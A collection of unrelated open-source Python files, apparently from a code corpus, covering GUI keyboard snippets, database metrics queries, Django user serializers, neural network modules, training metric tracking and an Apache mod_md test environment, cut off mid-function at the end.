action.shortcut or '-' shortcut = shortcut if isinstance(action.shortcut, str) else ', '.join(shortcut) out[name] = '%s%s' % (shortcut, alias_str) return out def show_shortcuts(self): """Display all shortcuts in the console.""" show_shortcuts_snippets(self) def __contains__(self, name): """Whether the Actions group contains a specified action.""" return name in self._actions_dict def __repr__(self): return '<Actions {}>'.format(sorted(self._actions_dict)) # ----------------------------------------------------------------------------- # Snippets # ----------------------------------------------------------------------------- class Snippets(object): """Provide keyboard snippets to quickly execute actions from a GUI. This class attaches to a GUI and an `Actions` instance. To every command is associated a snippet with the same name, or with an alias as indicated in the action. The arguments of the action's callback functions can be provided in the snippet's command with a simple syntax. For example, the following command: ``` :my_action string 3-6 ``` corresponds to: ```python my_action('string', (3, 4, 5, 6)) ``` The snippet mode is activated with the `:` keyboard shortcut. A snippet command is activated with `Enter`, and one can leave the snippet mode with `Escape`. When the snippet mode is enabled (with `:`), this object adds a hidden Qt action for every keystroke. These actions are removed when the snippet mode is disabled. Constructor ----------- gui : GUI instance """ # HACK: Unicode characters do not seem to work on Python 2 cursor = '\u200A\u258C' # Allowed characters in snippet mode. # A Qt shortcut will be created for every character. _snippet_chars = r"abcdefghijklmnopqrstuvwxyz0123456789 ,.;?!_-+~=*/\(){}[]<>&|" def __init__(self, gui): self.gui = gui self._status_message = gui.status_message self.actions = Actions(gui, name='Snippets', menu='&File') # Register snippet mode shortcut. @self.actions.add(shortcut=':') def enable_snippet_mode(): """Enable the snippet mode (type action alias in the status bar).""" self.mode_on() self._create_snippet_actions() self.mode_off() @property def command(self): """This is used to write a snippet message in the status bar. A cursor is appended at the end.""" msg = self.gui.status_message n = len(msg) n_cur = len(self.cursor) return msg[:n - n_cur] @command.setter def command(self, value): value += self.cursor self.gui.unlock_status() self.gui.status_message = value self.gui.lock_status() def _backspace(self): """Erase the last character in the snippet command.""" if self.command == ':': return logger.log(5, "Snippet keystroke `Backspace`.") self.command = self.command[:-1] def _enter(self): """Disable the snippet mode and execute the command.""" command = self.command logger.log(5, "Snippet keystroke `Enter`.") # NOTE: we need to set back the actions (mode_off) before running # the command. self.mode_off() self.run(command) def _create_snippet_actions(self): """Add mock Qt actions for snippet keystrokes. Used to enable snippet mode. """ # One action per allowed character. for i, char in enumerate(self._snippet_chars): def _make_func(char): def callback(): logger.log(5, "Snippet keystroke `%s`.", char) self.command += char return callback # Lowercase letters. self.actions.add( name='_snippet_{}'.format(i), shortcut=char, callback=_make_func(char)) # Uppercase letters. if char in self._snippet_chars[:26]: self.actions.add( name='_snippet_{}_upper'.format(i), shortcut='shift+' + char, callback=_make_func(char.upper())) self.actions.add( name='_snippet_backspace', shortcut='backspace', callback=self._backspace) self.actions.add( name='_snippet_activate', shortcut=('enter', 'return'), callback=self._enter) self.actions.add( name='_snippet_disable', shortcut='escape', callback=self.mode_off) def run(self, snippet): """Execute a snippet command. May be overridden. """ assert snippet[0] == ':' snippet = snippet[1:] snippet_args = _parse_snippet(snippet) name = snippet_args[0] logger.debug("Processing snippet `%s`.", snippet) try: # Try to run the snippet on all attached Actions instances. for actions in self.gui.actions: try: actions.run(name, *snippet_args[1:]) return except ValueError: # This Actions instance doesn't contain the requested # snippet, trying the next attached Actions instance. pass logger.warning("Couldn't find action `%s`.", name) except Exception as e: logger.warning("Error when executing snippet: \"%s\".", str(e)) logger.debug(''.join(traceback.format_exception(*sys.exc_info()))) def is_mode_on(self): """Whether the snippet mode is enabled.""" return self.command.startswith(':') def mode_on(self): """Enable the snippet mode.""" logger.debug("Snippet mode enabled, press `escape` to leave this mode.") # Save the current status message. self._status_message = self.gui.status_message self.gui.lock_status() # Silent all actions except the Snippets actions. for actions in self.gui.actions: if actions != self.actions: actions.disable() self.actions.enable() self.command = ':' def mode_off(self): """Disable the snippet mode.""" self.gui.unlock_status() # Reset the GUI status message that was set before the mode was # activated. self.gui.status_message = self._status_message # Re-enable all actions except the Snippets actions. self.actions.disable() for actions in self.gui.actions: if actions != self.actions: actions.enable() # The `:` shortcut should always be enabled. self.actions.enable('enable_snippet_mode')
discovery-provider/src/queries/get_plays_metrics.py
atticwip/audius-protocol
429
8761
<gh_stars>100-1000 import logging import time from sqlalchemy import func, desc from src.models import Play from src.utils import db_session logger = logging.getLogger(__name__) def get_plays_metrics(args): """ Returns metrics for play counts Args: args: dict The parsed args from the request args.start_time: date The start of the query args.limit: number The max number of responses to return args.bucket_size: string A date_trunc operation to aggregate timestamps by Returns: Array of dictionaries with the play counts and timestamp """ db = db_session.get_db_read_replica() with db.scoped_session() as session: return _get_plays_metrics(session, args) def _get_plays_metrics(session, args): metrics_query = ( session.query( func.date_trunc(args.get("bucket_size"), Play.created_at).label( "timestamp" ), func.count(Play.id).label("count"), ) .filter(Play.created_at > args.get("start_time")) .group_by(func.date_trunc(args.get("bucket_size"), Play.created_at)) .order_by(desc("timestamp")) .limit(args.get("limit")) ) metrics = metrics_query.all() metrics = [ {"timestamp": int(time.mktime(m[0].timetuple())), "count": m[1]} for m in metrics ] return metrics
python/tests/extractor/refmt.py
kho/cdec
114
8765
#!/usr/bin/env python import collections, sys lines = [] f = collections.defaultdict(int) fe = collections.defaultdict(lambda: collections.defaultdict(int)) for line in sys.stdin: tok = [x.strip() for x in line.split('|||')] count = int(tok[4]) f[tok[1]] += count fe[tok[1]][tok[2]] += count lines.append(tok) for tok in lines: feat = 'IsSingletonF={0}.0 IsSingletonFE={1}.0'.format( 0 if f[tok[1]] > 1 else 1, 0 if fe[tok[1]][tok[2]] > 1 else 1) print ' ||| '.join((tok[0], tok[1], tok[2], feat, tok[3]))
Toolkits/CMake/hunter/packages/sugar/python/sugar/sugar_warnings_wiki_table_generator.py
roscopecoltran/SniperKit-Core
102
8773
<reponame>roscopecoltran/SniperKit-Core #!/usr/bin/env python3 # Copyright (c) 2014, <NAME> # All rights reserved. """ * Wiki table for `leathers` C++ project Expected format: ### Main table Name | Clang | GCC | MSVC | -----------------------------|----------|----------|------| static-ctor-not-thread-safe | *no* | *no* | 4640 | switch | **same** | **same** | 4062 | switch-enum | **same** | **same** | 4061 | ### Xcode/Clang table Clang | Xcode | Objective-C | -----------------------|--------------------------------|-------------| bool-conversion | CLANG_WARN_BOOL_CONVERSION | no | c++11-extensions | CLANG_WARN_CXX0X_EXTENSIONS | no | strict-selector-match | GCC_WARN_STRICT_SELECTOR_MATCH | yes | undeclared-selector | GCC_WARN_UNDECLARED_SELECTOR | yes | """ def generate(main_warnings_table): groups = set() for i in main_warnings_table: if i.group != "": groups.add(i.group) wiki_file = open("wiki-table.txt", "w") generate_main_table(main_warnings_table, wiki_file) for group in groups: generate_group_table(main_warnings_table, wiki_file, group) generate_xcode_table(main_warnings_table, wiki_file) def generate_main_table(main_warnings_table, wiki_file): head_name = "Name" head_clang = "Clang" head_gcc = "GCC" head_msvc = "MSVC" def calc_max(head, visitor): max_len = len(head) for x in main_warnings_table: cur_len = visitor(x) if cur_len > max_len: max_len = cur_len return max_len + 2 def name_visitor(table_entry): if table_entry.group != "": return 0 return len(table_entry.warning_name) def clang_visitor(table_entry): if table_entry.group != "": return 0 return len(table_entry.clang.wiki_entry(table_entry.warning_name)) def gcc_visitor(table_entry): if table_entry.group != "": return 0 return len(table_entry.gcc.wiki_entry(table_entry.warning_name)) def msvc_visitor(table_entry): if table_entry.group != "": return 0 return len(table_entry.msvc.wiki_entry(table_entry.warning_name)) max_name = calc_max(head_name, name_visitor) max_clang = calc_max(head_clang, clang_visitor) max_gcc = calc_max(head_gcc, gcc_visitor) max_msvc = calc_max(head_msvc, msvc_visitor) def fill_string(name, max_name): result = " " + name + " "; assert(max_name >= len(result)) left = max_name - len(result) return result + " " * left wiki_file.write("### Main table\n\n") s = "{}|{}|{}|{}|\n".format( fill_string(head_name, max_name), fill_string(head_clang, max_clang), fill_string(head_gcc, max_gcc), fill_string(head_msvc, max_msvc), ) wiki_file.write(s) s = "{}|{}|{}|{}|\n".format( '-' * max_name, '-' * max_clang, '-' * max_gcc, '-' * max_msvc, ) wiki_file.write(s) for entry in main_warnings_table: if entry.group != "": continue s = "{}|{}|{}|{}|\n".format( fill_string(entry.warning_name, max_name), fill_string(entry.clang.wiki_entry(entry.warning_name), max_clang), fill_string(entry.gcc.wiki_entry(entry.warning_name), max_gcc), fill_string(entry.msvc.wiki_entry(entry.warning_name), max_msvc), ) wiki_file.write(s) def generate_group_table(main_warnings_table, wiki_file, group): head_name = "Name" head_clang = "Clang" head_gcc = "GCC" head_msvc = "MSVC" def calc_max(head, visitor): max_len = len(head) for x in main_warnings_table: cur_len = visitor(x) if cur_len > max_len: max_len = cur_len return max_len + 2 def name_visitor(table_entry): if table_entry.group != group: return 0 return len(table_entry.warning_name) def clang_visitor(table_entry): if table_entry.group != group: return 0 return len(table_entry.clang.wiki_entry(table_entry.warning_name)) def gcc_visitor(table_entry): if table_entry.group != group: return 0 return len(table_entry.gcc.wiki_entry(table_entry.warning_name)) def msvc_visitor(table_entry): if table_entry.group != group: return 0 return len(table_entry.msvc.wiki_entry(table_entry.warning_name)) max_name = calc_max(head_name, name_visitor) max_clang = calc_max(head_clang, clang_visitor) max_gcc = calc_max(head_gcc, gcc_visitor) max_msvc = calc_max(head_msvc, msvc_visitor) def fill_string(name, max_name): result = " " + name + " "; assert(max_name >= len(result)) left = max_name - len(result) return result + " " * left wiki_file.write("\n### Table for group: `{}`\n\n".format(group)) s = "{}|{}|{}|{}|\n".format( fill_string(head_name, max_name), fill_string(head_clang, max_clang), fill_string(head_gcc, max_gcc), fill_string(head_msvc, max_msvc), ) wiki_file.write(s) s = "{}|{}|{}|{}|\n".format( '-' * max_name, '-' * max_clang, '-' * max_gcc, '-' * max_msvc, ) wiki_file.write(s) for entry in main_warnings_table: if entry.group != group: continue s = "{}|{}|{}|{}|\n".format( fill_string(entry.warning_name, max_name), fill_string(entry.clang.wiki_entry(entry.warning_name), max_clang), fill_string(entry.gcc.wiki_entry(entry.warning_name), max_gcc), fill_string(entry.msvc.wiki_entry(entry.warning_name), max_msvc), ) wiki_file.write(s) def generate_xcode_table(main_warnings_table, wiki_file): head_clang = "Clang" head_xcode = "Xcode" head_objc = "Objective-C" def calc_max(head, visitor): max_len = len(head) for x in main_warnings_table: cur_len = visitor(x) if cur_len > max_len: max_len = cur_len return max_len + 2 def clang_visitor(table_entry): if table_entry.xcode.option == "": return 0 return len(table_entry.clang.option) def xcode_visitor(table_entry): if table_entry.xcode.option == "": return 0 return len(table_entry.xcode.option) def objc_visitor(table_entry): if table_entry.xcode.option == "": return 0 if table_entry.objc: return 3 # "yes" else: return 2 # "no" max_clang = calc_max(head_clang, clang_visitor) max_xcode = calc_max(head_xcode, xcode_visitor) max_objc = calc_max(head_objc, objc_visitor) def fill_string(name, max_name): result = " " + name + " "; assert(max_name >= len(result)) left = max_name - len(result) return result + " " * left wiki_file.write("\n\n### Xcode/Clang table\n\n") s = "{}|{}|{}|\n".format( fill_string(head_clang, max_clang), fill_string(head_xcode, max_xcode), fill_string(head_objc, max_objc), ) wiki_file.write(s) s = "{}|{}|{}|\n".format( '-' * max_clang, '-' * max_xcode, '-' * max_objc, ) wiki_file.write(s) done_list = [] for entry in main_warnings_table: if entry.xcode.option == "": continue if entry.clang.option in done_list: continue done_list.append(entry.clang.option) if entry.objc: objc = "yes" else: objc = "no" s = "{}|{}|{}|\n".format( fill_string(entry.clang.option, max_clang), fill_string(entry.xcode.option, max_xcode), fill_string(objc, max_objc), ) wiki_file.write(s)
open/users/serializers.py
lawrendran/open
105
8782
import pytz from rest_auth.serializers import TokenSerializer from rest_framework.authtoken.models import Token from rest_framework.exceptions import ValidationError from rest_framework.fields import ( CharField, CurrentUserDefault, HiddenField, UUIDField, ChoiceField, ) from rest_framework.serializers import ModelSerializer, Serializer from rest_framework.validators import UniqueValidator from django.contrib.auth.hashers import check_password from open.users.models import User class SimpleUserReadSerializer(ModelSerializer): class Meta: model = User fields = ( "name", "uuid", ) class UserReadSerializer(ModelSerializer): class Meta: model = User fields = ( "name", "uuid", "signed_up_from", "date_joined", "username", "email", "created", "modified", ) class UserTokenSerializer(TokenSerializer): user = UserReadSerializer() class Meta: model = Token fields = ["key", "user"] # TODO - this view and serializer is on hold as you figure out registration (later) class UserCreateSerializer(ModelSerializer): username = CharField(validators=[UniqueValidator(queryset=User.objects.all())]) # need to make email optional ... prob should think through signup form a little email = CharField( validators=[UniqueValidator(queryset=User.objects.all())], required=False ) password = CharField(write_only=True, min_length=8) signed_up_from = CharField( write_only=True, min_length=8, required=False, default="", trim_whitespace=True ) timezone_string = ChoiceField( choices=pytz.all_timezones, required=False, default="US/Eastern" ) class Meta: model = User fields = ["username", "email", "password", "signed_up_from", "timezone_string"] # TODO test - does this work with just username / no email, etc. def create(self, validated_data): username = validated_data.pop("username") password = validated_data.pop("password") is_betterself_user = False if validated_data["signed_up_from"] == "betterself": is_betterself_user = True validated_data["is_betterself_user"] = is_betterself_user user = User.objects.create(username=username, **validated_data) user.set_password(password) user.save() return user class UserDeleteSerializer(Serializer): # most of this is actually redundant, i don't need to have a validation step, but i do this # out of paranoia reasons that someone may delete their account by mistake password = CharField() user = HiddenField(default=CurrentUserDefault()) uuid = UUIDField() def validate(self, data): user = data["user"] validated_password = check_password(data["password"], user.password) if not validated_password: raise ValidationError("Invalid Password Entered") validated_uuid = str(user.uuid) == str(data["uuid"]) if not validated_uuid: raise ValidationError("Invalid UUID", str(user.uuid)) validate_user = user.username != "<EMAIL>" if not validate_user: raise ValidationError( f"This is a protected user and cannot be deleted. {user.username}" ) return data
speech/melgan/model/multiscale.py
OthmaneJ/deep-tts
213
8784
import torch import torch.nn as nn import torch.nn.functional as F from .discriminator import Discriminator from .identity import Identity class MultiScaleDiscriminator(nn.Module): def __init__(self): super(MultiScaleDiscriminator, self).__init__() self.discriminators = nn.ModuleList( [Discriminator() for _ in range(3)] ) self.pooling = nn.ModuleList( [Identity()] + [nn.AvgPool1d(kernel_size=4, stride=2, padding=2) for _ in range(1, 3)] ) def forward(self, x): ret = list() for pool, disc in zip(self.pooling, self.discriminators): x = pool(x) ret.append(disc(x)) return ret # [(feat, score), (feat, score), (feat, score)]
allennlp/training/metric_tracker.py
MSLars/allennlp
11,433
8791
from typing import Optional, Dict, Any, List, Union from allennlp.common.checks import ConfigurationError class MetricTracker: """ This class tracks a metric during training for the dual purposes of early stopping and for knowing whether the current value is the best so far. It mimics the PyTorch `state_dict` / `load_state_dict` interface, so that it can be checkpointed along with your model and optimizer. Some metrics improve by increasing; others by decreasing. You can provide a `metric_name` that starts with "+" to indicate an increasing metric, or "-" to indicate a decreasing metric. # Parameters metric_name : `Union[str, List[str]]` Specifies the metric or metrics to track. Metric names have to start with "+" for increasing metrics or "-" for decreasing ones. If you specify more than one, it tracks the sum of the increasing metrics metrics minus the sum of the decreasing metrics. patience : `int`, optional (default = `None`) If provided, then `should_stop_early()` returns True if we go this many epochs without seeing a new best value. """ def __init__( self, metric_name: Union[str, List[str]], patience: Optional[int] = None, ) -> None: self._patience = patience self._best_so_far: Optional[float] = None self._epochs_with_no_improvement = 0 self._is_best_so_far = True self._epoch_number = 0 self.best_epoch: Optional[int] = None self.best_epoch_metrics: Dict[str, float] = {} if isinstance(metric_name, str): metric_name = [metric_name] self.tracked_metrics = [] for name in metric_name: if name.startswith("+"): self.tracked_metrics.append((1.0, name[1:])) elif name.startswith("-"): self.tracked_metrics.append((-1.0, name[1:])) else: raise ConfigurationError("metric_name must start with + or -") def clear(self) -> None: """ Clears out the tracked metrics, but keeps the patience """ self._best_so_far = None self._epochs_with_no_improvement = 0 self._is_best_so_far = True self._epoch_number = 0 self.best_epoch = None self.best_epoch_metrics.clear() def state_dict(self) -> Dict[str, Any]: """ A `Trainer` can use this to serialize the state of the metric tracker. """ return { "best_so_far": self._best_so_far, "epochs_with_no_improvement": self._epochs_with_no_improvement, "is_best_so_far": self._is_best_so_far, "epoch_number": self._epoch_number, "best_epoch": self.best_epoch, "best_epoch_metrics": self.best_epoch_metrics, } def load_state_dict(self, state_dict: Dict[str, Any]) -> None: """ A `Trainer` can use this to hydrate a metric tracker from a serialized state. """ self._best_so_far = state_dict["best_so_far"] self._epochs_with_no_improvement = state_dict["epochs_with_no_improvement"] self._is_best_so_far = state_dict["is_best_so_far"] self._epoch_number = state_dict["epoch_number"] self.best_epoch = state_dict["best_epoch"] # Even though we don't promise backwards compatibility for the --recover flag, # it's particularly easy and harmless to provide it here, so we do it. self.best_epoch_metrics = state_dict.get("best_epoch_metrics", {}) def add_metrics(self, metrics: Dict[str, float]) -> None: """ Record a new value of the metric and update the various things that depend on it. """ combined_score = self.combined_score(metrics) new_best = (self._best_so_far is None) or (combined_score > self._best_so_far) if new_best: self._best_so_far = combined_score self._epochs_with_no_improvement = 0 self._is_best_so_far = True self.best_epoch = self._epoch_number else: self._epochs_with_no_improvement += 1 self._is_best_so_far = False self._epoch_number += 1 def is_best_so_far(self) -> bool: """ Returns true if the most recent value of the metric is the best so far. """ return self._is_best_so_far def should_stop_early(self) -> bool: """ Returns true if improvement has stopped for long enough. """ if self._patience is None: return False else: return self._epochs_with_no_improvement >= self._patience def combined_score(self, metrics: Dict[str, float]) -> float: try: return sum( factor * metrics[metric_name] for factor, metric_name in self.tracked_metrics ) except KeyError as e: raise ConfigurationError( f"You configured the trainer to use the {e.args[0]} " "metric for early stopping, but the model did not produce that metric." )
DQM/L1TMonitor/python/L1TGCT_cfi.py
ckamtsikis/cmssw
852
8798
import FWCore.ParameterSet.Config as cms from DQMServices.Core.DQMEDAnalyzer import DQMEDAnalyzer l1tGct = DQMEDAnalyzer('L1TGCT', gctCentralJetsSource = cms.InputTag("gctDigis","cenJets"), gctForwardJetsSource = cms.InputTag("gctDigis","forJets"), gctTauJetsSource = cms.InputTag("gctDigis","tauJets"), gctIsoTauJetsSource = cms.InputTag("gctDigis","fake"), gctEnergySumsSource = cms.InputTag("gctDigis"), gctIsoEmSource = cms.InputTag("gctDigis","isoEm"), gctNonIsoEmSource = cms.InputTag("gctDigis","nonIsoEm"), monitorDir = cms.untracked.string("L1T/L1TGCT"), verbose = cms.untracked.bool(False), stage1_layer2_ = cms.bool(False), DQMStore = cms.untracked.bool(True), disableROOToutput = cms.untracked.bool(True), filterTriggerType = cms.int32(1) )
tests/integration/lambdas/lambda_python3.py
jorges119/localstack
31,928
8806
<reponame>jorges119/localstack # simple test function that uses python 3 features (e.g., f-strings) # see https://github.com/localstack/localstack/issues/264 def handler(event, context): # the following line is Python 3.6+ specific msg = f"Successfully processed {event}" # noqa This code is Python 3.6+ only return event
test/modules/md/md_env.py
icing/mod_md
320
8810
import copy import inspect import json import logging import pytest import re import os import shutil import subprocess import time from datetime import datetime, timedelta from configparser import ConfigParser, ExtendedInterpolation from typing import Dict, List, Optional from pyhttpd.certs import CertificateSpec from .md_cert_util import MDCertUtil from pyhttpd.env import HttpdTestSetup, HttpdTestEnv from pyhttpd.result import ExecResult log = logging.getLogger(__name__) class MDTestSetup(HttpdTestSetup): def __init__(self, env: 'HttpdTestEnv'): super().__init__(env=env) def make(self): super().make(add_modules=["proxy_connect", "md"]) if "pebble" == self.env.acme_server: self._make_pebble_conf() def _make_pebble_conf(self): our_dir = os.path.dirname(inspect.getfile(MDTestSetup)) conf_src_dir = os.path.join(our_dir, 'pebble') conf_dest_dir = os.path.join(self.env.gen_dir, 'pebble') if not os.path.exists(conf_dest_dir): os.makedirs(conf_dest_dir) for name in os.listdir(conf_src_dir): src_path = os.path.join(conf_src_dir, name) m = re.match(r'(.+).template', name) if m: self._make_template(src_path, os.path.join(conf_dest_dir, m.group(1))) elif os.path.isfile(src_path): shutil.copy(src_path, os.path.join(conf_dest_dir, name)) class MDTestEnv(HttpdTestEnv): MD_S_UNKNOWN = 0 MD_S_INCOMPLETE = 1 MD_S_COMPLETE = 2 MD_S_EXPIRED = 3 MD_S_ERROR = 4 EMPTY_JOUT = {'status': 0, 'output': []} DOMAIN_SUFFIX = "%d.org" % time.time() LOG_FMT_TIGHT = '%(levelname)s: %(message)s' @classmethod def get_acme_server(cls): return os.environ['ACME'] if 'ACME' in os.environ else "pebble" @classmethod def has_acme_server(cls): return cls.get_acme_server() != 'none' @classmethod def has_acme_eab(cls): return cls.get_acme_server() == 'pebble' @classmethod def is_pebble(cls) -> bool: return cls.get_acme_server() == 'pebble' @classmethod def lacks_ocsp(cls): return cls.is_pebble() def __init__(self, pytestconfig=None, setup_dirs=True): super().__init__(pytestconfig=pytestconfig, local_dir=os.path.dirname(inspect.getfile(MDTestEnv)), interesting_modules=["md"]) self._acme_server = self.get_acme_server() self._acme_tos = "accepted" self._acme_ca_pemfile = os.path.join(self.gen_dir, "apache/acme-ca.pem") if "pebble" == self._acme_server: self._acme_url = "https://localhost:14000/dir" self._acme_eab_url = "https://localhost:14001/dir" elif "boulder" == self._acme_server: self._acme_url = "http://localhost:4001/directory" self._acme_eab_url = None else: raise Exception(f"unknown ACME server type: {self._acme_server}") self._acme_server_down = False self._acme_server_ok = False self._a2md_bin = os.path.join(self.bin_dir, 'a2md') self._default_domain = f"test1.{self.http_tld}" self._store_dir = "./md" self.set_store_dir_default() self.add_cert_specs([ CertificateSpec(domains=[f"expired.{self._http_tld}"], valid_from=timedelta(days=-100), valid_to=timedelta(days=-10)), CertificateSpec(domains=["localhost"], key_type='rsa2048'), ]) self.httpd_error_log.set_ignored_lognos([ #"AH10045", # mod_md complains that there is no vhost for an MDomain "AH10105", # mod_md does not find a vhost with SSL enabled for an MDomain "AH10085" # mod_ssl complains about fallback certificates ]) if self.lacks_ocsp(): self.httpd_error_log.set_ignored_patterns([ re.compile(r'.*certificate with serial \S+ has no OCSP responder URL.*'), ]) if setup_dirs: self._setup = MDTestSetup(env=self) self._setup.make() self.issue_certs() self.clear_store() def set_store_dir_default(self): dirpath = "md" if self.httpd_is_at_least("2.5.0"): dirpath = os.path.join("state", dirpath) self.set_store_dir(dirpath) def set_store_dir(self, dirpath): self._store_dir = os.path.join(self.server_dir, dirpath) if self.acme_url: self.a2md_stdargs([self.a2md_bin, "-a", self.acme_url, "-d", self._store_dir, "-C", self.acme_ca_pemfile, "-j"]) self.a2md_rawargs([self.a2md_bin, "-a", self.acme_url, "-d", self._store_dir, "-C", self.acme_ca_pemfile]) def get_apxs_var(self, name: str) -> str: p = subprocess.run([self._apxs, "-q", name], capture_output=True, text=True) if p.returncode != 0: return "" return p.stdout.strip() @property def acme_server(self): return self._acme_server @property def acme_url(self): return self._acme_url @property def acme_tos(self): return self._acme_tos @property def a2md_bin(self): return self._a2md_bin @property def acme_ca_pemfile(self): return self._acme_ca_pemfile @property def store_dir(self): return self._store_dir def get_request_domain(self, request): return "%s-%s" % (re.sub(r'[_]', '-', request.node.originalname), MDTestEnv.DOMAIN_SUFFIX) def get_method_domain(self, method): return "%s-%s" % (re.sub(r'[_]', '-', method.__name__.lower()), MDTestEnv.DOMAIN_SUFFIX) def get_module_domain(self, module): return "%s-%s" % (re.sub(r'[_]', '-', module.__name__.lower()), MDTestEnv.DOMAIN_SUFFIX) def get_class_domain(self, c): return "%s-%s" % (re.sub(r'[_]', '-', c.__name__.lower()), MDTestEnv.DOMAIN_SUFFIX) # --------- cmd execution --------- _a2md_args = [] _a2md_args_raw = [] def a2md_stdargs(self, args): self._a2md_args = [] + args def a2md_rawargs(self, args): self._a2md_args_raw = [] + args def a2md(self, args, raw=False) -> ExecResult: preargs = self._a2md_args if raw: preargs = self._a2md_args_raw log.debug("running: {0} {1}".format(preargs, args)) return self.run(preargs + args) def check_acme(self): if self._acme_server_ok: return True if self._acme_server_down: pytest.skip(msg="ACME server not running") return False if self.is_live(self.acme_url, timeout=timedelta(seconds=0.5)): self._acme_server_ok = True return True else: self._acme_server_down = True pytest.fail(msg="ACME server not running", pytrace=False) return False def get_ca_pem_file(self, hostname: str) -> Optional[str]: pem_file = super().get_ca_pem_file(hostname) if pem_file is None: pem_file = self.acme_ca_pemfile return pem_file # --------- access local store --------- def purge_store(self): log.debug("purge store dir: %s" % self._store_dir) assert len(self._store_dir) > 1 if os.path.exists(self._store_dir): shutil.rmtree(self._store_dir, ignore_errors=False) os.makedirs(self._store_dir) def clear_store(self): log.debug("clear store dir: %s" % self._store_dir) assert len(self._store_dir) > 1 if not os.path.exists(self._store_dir): os.makedirs(self._store_dir) for dirpath in ["challenges", "tmp", "archive", "domains", "accounts", "staging", "ocsp"]: shutil.rmtree(os.path.join(self._store_dir, dirpath), ignore_errors=True) def clear_ocsp_store(self): assert len(self._store_dir) > 1 dirpath = os.path.join(self._store_dir, "ocsp") log.debug("clear ocsp store dir: %s" % dir) if os.path.exists(dirpath): shutil.rmtree(dirpath, ignore_errors=True) def authz_save(self, name, content): dirpath = os.path.join(self._store_dir, 'staging', name) os.makedirs(dirpath) open(os.path.join(dirpath, 'authz.json'), "w").write(content) def path_store_json(self): return os.path.join(self._store_dir, 'md_store.json') def path_account(self, acct): return os.path.join(self._store_dir, 'accounts', acct, 'account.json') def path_account_key(self, acct): return os.path.join(self._store_dir, 'accounts', acct, 'account.pem') def store_domains(self): return os.path.join(self._store_dir, 'domains') def store_archives(self): return os.path.join(self._store_dir, 'archive') def store_stagings(self): return os.path.join(self._store_dir, 'staging') def store_challenges(self): return os.path.join(self._store_dir, 'challenges') def store_domain_file(self, domain, filename): return os.path.join(self.store_domains(), domain, filename) def store_archived_file(self, domain, version, filename): return os.path.join(self.store_archives(), "%s.%d" % (domain, version), filename) def store_staged_file(self, domain, filename): return os.path.join(self.store_stagings(), domain, filename) def path_fallback_cert(self, domain): return os.path.join(self._store_dir, 'domains', domain, 'fallback-pubcert.pem') def path_job(self, domain): return os.path.join(self._store_dir, 'staging', domain, 'job.json') def replace_store(self, src): shutil.rmtree(self._store_dir, ignore_errors=False) shutil.copytree(src, self._store_dir) def list_accounts(self): return os.listdir(os.path.join(self._store_dir, 'accounts')) def check_md(self, domain, md=None, state=-1, ca=None, protocol=None, agreement=None, contacts=None): domains = None if isinstance(domain, list): domains = domain domain = domains[0] if md: domain = md path = self.store_domain_file(domain, 'md.json') with open(path) as f: md = json.load(f) assert md if domains: assert md['domains'] == domains if state >= 0: assert md['state'] == state if ca: assert md['ca']['url'] == ca if protocol: assert md['ca']['proto'] == protocol if agreement: assert md['ca']['agreement'] == agreement if contacts: assert md['contacts'] == contacts def pkey_fname(self, pkeyspec=None): if pkeyspec and not re.match(r'^rsa( ?\d+)?$', pkeyspec.lower()): return "privkey.{0}.pem".format(pkeyspec) return 'privkey.pem' def cert_fname(self, pkeyspec=None): if pkeyspec and not re.match(r'^rsa( ?\d+)?$', pkeyspec.lower()): return "pubcert.{0}.pem".format(pkeyspec) return 'pubcert.pem' def check_md_complete(self, domain, pkey=None): md = self.get_md_status(domain) assert md assert 'state' in md, "md is unexpected: {0}".format(md) assert md['state'] is MDTestEnv.MD_S_COMPLETE, "unexpected state: {0}".format(md['state']) assert os.path.isfile(self.store_domain_file(domain, self.pkey_fname(pkey))) assert os.path.isfile(self.store_domain_file(domain, self.cert_fname(pkey))) def check_md_credentials(self, domain): if isinstance(domain, list): domains = domain domain = domains[0] else: domains = [domain] # check private key, validate certificate, etc MDCertUtil.validate_privkey(self.store_domain_file(domain, 'privkey.pem')) cert = MDCertUtil(self.store_domain_file(domain, 'pubcert.pem')) cert.validate_cert_matches_priv_key(self.store_domain_file(domain, 'privkey.pem')) # check SANs and CN assert cert.get_cn() == domain # compare lists twice in opposite directions: SAN may not respect ordering san_list = list(cert.get_san_list()) assert len(san_list) == len(domains) assert set(san_list).issubset(domains) assert set(domains).issubset(san_list) # check valid dates interval not_before = cert.get_not_before() not_after = cert.get_not_after() assert not_before < datetime.now(not_before.tzinfo) assert not_after > datetime.now(not_after.tzinfo) # --------- check utilities --------- def check_json_contains(self, actual, expected): # write all expected key:value bindings to a copy of the actual data ... # ... assert it stays unchanged test_json = copy.deepcopy(actual) test_json.update(expected) assert actual == test_json def check_file_access(self, path, exp_mask): actual_mask = os.lstat(path).st_mode & 0o777 assert oct(actual_mask) == oct(exp_mask) def check_dir_empty(self, path): assert os.listdir(path) == [] def get_http_status(self, domain, path, use_https=True): r = self.get_meta(domain, path, use_https, insecure=True) return r.response['status'] def get_cert(self, domain, tls=None, ciphers=None): return MDCertUtil.load_server_cert(self._httpd_addr, self.https_port, domain, tls=tls, ciphers=ciphers) def get_server_cert(self, domain, proto=None, ciphers=None): args = [ "openssl", "s_client", "-status", "-connect", "%s:%s" % (self._httpd_addr, self.https_port), "-CAfile", self.acme_ca_pemfile, "-servername", domain, "-showcerts" ] if proto is not None: args.extend(["-{0}".format(proto)]) if ciphers is not None: args.extend(["-cipher", ciphers]) r = self.run(args) # noinspection PyBroadException try: return MDCertUtil.parse_pem_cert(r.stdout) except: return None def verify_cert_key_lenghts(self, domain, pkeys): for p in pkeys: cert = self.get_server_cert(domain, proto="tls1_2", ciphers=p['ciphers']) if 0 == p['keylen']: assert cert is None else: assert cert, "no cert returned for cipher: {0}".format(p['ciphers']) assert cert.get_key_length() == p['keylen'], "key length, expected {0}, got {1}".format( p['keylen'], cert.get_key_length() ) def get_meta(self, domain, path, use_https=True, insecure=False): schema = "https" if use_https else "http" port = self.https_port if use_https else self.http_port r = self.curl_get(f"{schema}://{domain}:{port}{path}", insecure=insecure) assert r.exit_code == 0 assert r.response assert r.response['header'] return r def get_content(self, domain, path, use_https=True): schema = "https" if use_https else "http" port = self.https_port if use_https else self.http_port r = self.curl_get(f"{schema}://{domain}:{port}{path}") assert r.exit_code == 0 return r.stdout def get_json_content(self, domain, path, use_https=True, insecure=False, debug_log=True): schema = "https" if use_https else "http" port = self.https_port if use_https else self.http_port url = f"{schema}://{domain}:{port}{path}" r = self.curl_get(url, insecure=insecure, debug_log=debug_log) 